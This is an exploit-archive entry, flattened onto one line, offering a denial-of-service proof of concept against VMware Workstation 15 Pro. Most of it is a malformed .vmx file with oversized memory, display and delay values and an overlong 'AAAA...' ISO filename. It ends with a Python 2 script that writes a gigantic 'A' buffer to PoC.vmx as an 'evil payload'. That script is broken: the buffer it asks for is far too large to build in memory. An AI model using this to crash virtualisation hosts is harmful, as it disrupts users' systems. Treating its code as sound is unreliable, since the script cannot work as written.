VMware Workstation 15 Pro - Denial of Service
Author: Milad karimi
type: dos
platform: windows
port:
date_added: 2023-03-28
date_updated: 2023-03-28
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51100.txt
type: dos
platform: windows
port:
date_added: 2023-03-28
date_updated: 2023-03-28
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51100.txt
#Title: VMware Workstation 15 Pro - Denial of Service #Author: Milad Karimi #Date: 2022-10-17 #Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506) #Affected: VMware Workstation Pro/Player 15.x config.version = "8" virtualHW.version = "4" displayName = "credit's to Ex3ptionaL for find this vouln" annotation = "Live CD ISO http://www.irongeek.com" guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln" guestinfo.vmware.product.url = "http://www.millw0rm.com" guestinfo.vmware.product.short = "LCDI" guestinfo.vmware.product.version.major = "1" guestinfo.vmware.product.version.minor = "0" guestinfo.vmware.product.version.revision = "0" guestinfo.vmware.product.version.type = "release" guestinfo.vmware.product.class = "virtual machine" guestinfo.vmware.product.build = "1.0.0rc8-20051212" uuid.action = "create" guestOS = "winxppro" ##### # Memory ##### memsize = "20000000000000" # memsize = "300000000000000000000000000000" # memsize = "400000000000000000000" # memsize = "700000000000000000000000000000000000" # # Alternative larger memory allocations ##### # USB ##### usb.present = "TRUE" ##### # Floppy ##### floppy0.present = "FALSE" ##### # IDE Storage ##### ide1:0.present = "TRUE" #Edit line below to change ISO to boot from ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso" ide1:0.deviceType = "cdrom-image" ide1:0.startConnected = "TRUE" ide1:0.autodetect = "TRUE" ##### # Network ##### ethernet0.present = "TRUE" ethernet0.connectionType = "nat" # ethernet0.connectionType = "bridged" # # Switch these two to enable "Bridged" vs. "NAT" ##### # Sound ##### sound.present = "TRUE" sound.virtualDev = "es1371" sound.autoDetect = "TRUE" sound.fileName = "-1" ##### # Misc. # # (normal) high priority.grabbed = "high" tools.syncTime = "TRUE" workingDir = "." # # (16) 32 64 sched.mem.pShare.checkRate = "32" # # (32) 64 128 sched.mem.pshare.scanRate = "64" # # Higher resolution lockout, adjust values to exceed 800x600 svga.maxWidth = "8000000000000000000" svga.maxHeight = "6000000000000000000" # # (F) T isolation.tools.dnd.disable = "FALSE" # # (F) T isolation.tools.hgfs.disable = "FALSE" # # (F) T isolation.tools.copy.disable = "FALSE" # # (F) T isolation.tools.paste.disable = "FALSE" # # (T) F logging = "TRUE" # # # (F) T log.append = "FALSE" # # (3) number of older files kept log.keepOld = "1" # # (0) microseconds keyboard.typematicMinDelay = 100000000000000000 uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a" uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a" ethernet0.addressType = "generated" ethernet0.generatedAddress = "00:0c:29:3c:d4:4a" ethernet0.generatedAddressOffset = "0" checkpoint.vmState = "live-cd-iso.vmss" tools.remindInstall = "TRUE" Exploit code() buffer = "A" * 118000000000000000 payload = buffer try: f=open("PoC.vmx","w") print "[+] Creating %s evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
Copyright © 2024 Irfan TOOR all rights reserved.